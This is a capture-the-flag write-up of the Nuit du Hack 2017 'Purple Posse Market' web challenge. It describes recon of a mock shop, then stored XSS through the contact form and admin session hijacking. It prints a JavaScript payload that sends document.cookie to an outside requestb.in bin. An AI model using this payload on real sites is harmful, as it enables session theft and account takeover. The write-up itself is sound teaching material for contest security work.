Here we go with another Write-Up ! This one is from the Nuit du Hack 2017 Quals CTF that took place on April 1st 2017 !

The following article describes Purple Posse Market web challenge solution!

We participated with the SwissMadeSecurity and ranked 99th/378 !

Step 1: Reconnaissance

Host

http://purplepossemarket.quals.nuitduhack.com/

Description

You work for the government in the forensic department, you are investigating on an illegal website which sells illegal drugs and weapons, you need to find a way to get the IBAN of the administrator of the website.

The targeted website was then a drugs and weapons e-commerce website that was looking like it was coming straight from the great age of webdesign revolution back in the 90's :

Alt Text

Navigating through the menu we could find an about page with some informations about order processing and else :

Alt Text

Plus, a simple page containing all products :

Alt Text

When a product got selected, we got redirected to /product/product_id where we could find detailed informations about the chosen product and a simple form requesting your email address and the product quantity wanted :

Alt Text

We could also notice some products were not available :

Alt Text

Last but not least, we discovered a contact page displaying a message stating that an admin will read our message plus, that it was currently connected :

Alt Text

Juggling around with various URLs, we found an admin panel @ /admin that redirected us to /admin/login :

Alt Text

We then checked the cookies to see if there was something interesting :

Alt Text

We could find an interesting cookie named connect.sid

Considering all this, after a quick and efficient recon we could easily assume that the contact form was vulnerable to XSS (Cross-Site Scripting) that would allow us to steal the admin cookie, log in and (maybe) find his IBAN.

Let's now validate our assumptions !

Step 2: Vulnerability Testing

We started a request.bin and injected the following payload into the contact form :

Alt Text

var i = new Image();i.src="http://requestb.in/1kxo2b11?cookie="+document.cookie;

 

As expected, we got the admin cookie to be sent right into our bin :

Alt Text

 

Step 3: Flag !

We then got back to the admin panel, spoofed the cookie with the cool EditThisCookie Chrome Extension and refreshed the page.

We got the desired effect !

Alt Text

We only had to provide the IBAN as is to the scoreboard to complete the challenge.